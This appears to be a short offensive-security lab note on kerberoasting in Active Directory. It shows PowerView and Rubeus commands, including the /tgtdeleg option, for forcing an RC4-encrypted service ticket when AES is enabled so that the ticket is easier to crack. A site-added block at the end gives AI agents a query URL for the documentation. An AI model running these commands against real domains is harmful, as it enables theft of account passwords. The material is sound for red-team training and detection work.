# Kerberoasting: Requesting RC4 Encrypted TGS when AES is Enabled

It is possible to kerberoast a user account with SPN even if the account supports Kerberos AES encryption by requesting an RC4 ecnrypted (instead of AES) TGS which easier to crack.

## Execution

First off, let's confirm we have at least one user with an SPN set:

{% code title="attacker\@victim" %}

```
Get-NetUser -SPN sandy
```

{% endcode %}

![](/files/-LeC_1tcpl1KPWWouoZk)

Since the user account does not support Kerberos AES ecnryption by default, when requesting a TGS ticket for kerberoasting with rubeus, we will get an RC4 encrypted ticket:

{% code title="attacker\@victim" %}

```
F:\Rubeus\Rubeus.exe kerberoast /user:sandy
```

{% endcode %}

![](/files/-LeC_aqPA-VtGrKX8HTD)

If the user is now set to support AES encryption:

![](/files/-LeC_ouxkaUpOSwPfS5l)

By default, returned tickets will be encrypted with the highest possible encryption algorithm, which is AES:

{% code title="attacker\@victim" %}

```
F:\Rubeus\Rubeus.exe kerberoast /user:sandy
```

{% endcode %}

![](/files/-LeCdtnIC0SuCcEFl5CA)

## Requesting RC4 Encrypted Ticket

As mentioned in the beginning, it's still possible to request an RC4 ecnrypted ticket (if RC4 is not disabled in the environment, which does not seem to be common yet):

{% code title="attacker\@victim" %}

```
F:\Rubeus\Rubeus.exe kerberoast /tgtdeleg
```

{% endcode %}

Even though AES encryption is supported by both parties, a TGS ticket encrypted with RC4 (encryption type 0x17/23) was returned. Note that SOCs may be monitoring for tickets encrypted with RC4:

![](/files/-LeCevY4uZ_2GNzRqOYZ)

## References

{% embed url="<https://www.harmj0y.net/blog/redteaming/kerberoasting-revisited/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.